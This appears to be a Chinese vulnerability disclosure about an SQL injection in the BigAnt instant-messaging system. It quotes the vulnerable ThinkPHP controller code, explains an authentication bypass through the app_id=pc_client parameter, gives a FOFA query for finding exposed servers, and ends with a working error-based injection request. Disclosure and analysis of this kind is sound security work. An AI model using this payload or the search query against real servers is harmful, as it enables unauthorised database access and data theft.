漏洞简介
杭州九麒科技大蚂蚁 (BigAnt) 即时通讯系统是一款企业级IM通信管理系统,提供多种功能支持。该系统的 \Admin\Controller\SecretController::edit 接口存在SQL注入漏洞,攻击者可通过在 updateLoginName 功能的相关参数中插入恶意构造的 SQL 查询语句,实现对后端数据库的非法操作,可能导致敏感信息泄露、数据篡改、绕过身份验证,甚至在特定配置下实现任意命令执行或获取系统控制权限。
影响版本
BigAnt 5.5.x 及以上版本用户

经过测试,最新版本 6.0.1.20250407.1 也受影响
fofa语法
(body="/Public/static/admin/admin_common.js" && body="/Public/lang/zh-cn.js.js") || title="即时通讯 系统登录" && body="/Public/static/ukey/Syunew3.js"
漏洞分析
系统是基于thinkphp 3.2架构,大部分采用数组形式的参数传递不存在sql注入
在 ThinkPHP 3.2 中:
->where(array条件)使用数组方式传参是安全的(框架会自动参数绑定/转义)->where("字符串拼接")使用字符串拼接外部输入是危险的->query($sql)/->execute($sql)直接执行原生 SQL,如果拼接了用户输入则存在注入风险I()函数虽有基本过滤,但不能完全防止 SQL 注入(特别是在字符串拼接场景下)
但是部分控制器的部分方法如SecretController.class.php下的edit()方法中
public function edit(){
$secLevel = I('get.sec_level');
$member = $this->MSecUser->table("hs_secret_user A")
->join("left join hs_user B on A.emp_id = B.user_id")
->where('A.emp_type=1 and A.sec_level='.$secLevel)
->field("A.*,B.user_name as emp_name")
// ->fetchSql(true)
->select();
// var_dump($member);die();
$this->assign('member',$member);
parent::common_edit($this->model);
}
$secLevel来自用户请求参数 I('get.sec_level'),
而在全局配置Application/Common/Conf/config.php中'DEFAULT_FILTER' => '',//不转义I函数,且admin模块的Application/Admin/Conf/config.php配置中没有DEFAULT_FILTER相关配置,表示当前模块遵循系统全局模块配置,不会对输入进行过滤。
直接拼接到SQL语句where('A.emp_type=1 and A.sec_level='.$secLevel)字符串中,攻击者可通过构造恶意 sec_level参数注入SQL payload造成SQL注入。
在看当前模块的初始化权限校验_initialize是如何处理的
//初始化
function _initialize() {
if($_REQUEST['app_id'] != 'pc_client'){ //pc端请求不验证
if ($this->validLogin && !in_array(strtolower(get_called_class()),self::$unvalidControllers)){
if ((! sp_user_islogin() || (sp_user_type() == 0))) {
parent::common_logout('public/logout') ;
}
//zou 20160705 当证当前页面与当前登录是否一致
if(!parent::valid_clientid_bool()){
parent::common_logout('public/logout') ;
}
}
//有时从其它应用转过来,没能经过load会有问题 死循化
if (! $_SESSION['grant'] && !in_array(strtolower(get_called_class()),self::$unvalidControllers)){
$this->redirect('public/logout');
exit;
}
}
if (!$this->checkPwdTime() && !in_array(ACTION_NAME,["password","password_post"])){
$this->redirect("profile/password");
};
$this->assign('moduleName',$this->moduleName);
$this->assign('change_lang',C("DEFAULT_LANG")==='zh-cn'?'切换英文':'Switching Chinese');
parent::_initialize();
}
当app_id=pc_client时,不需要验证权限。
漏洞复现
GET /admin/secret/edit?app_id=pc_client&sec_level={{url(1' AND EXTRACTVALUE(1, CONCAT(0x7e, user(), 0x7e)) and '1'='1)}} HTTP/1.1
Host: bigant.local:8000
Cookie: userId=admin;saasId=bigant
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

因为系统配置原因,不存在antdbms.hs_secret表,但是漏洞是真实存在的。


